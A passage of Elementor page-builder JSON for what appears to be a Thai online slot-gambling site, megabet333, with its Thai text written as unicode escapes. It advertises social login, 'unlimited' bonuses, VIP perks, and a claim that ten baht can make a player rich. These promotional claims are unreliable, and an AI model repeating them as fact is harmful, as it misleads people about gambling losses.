#ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 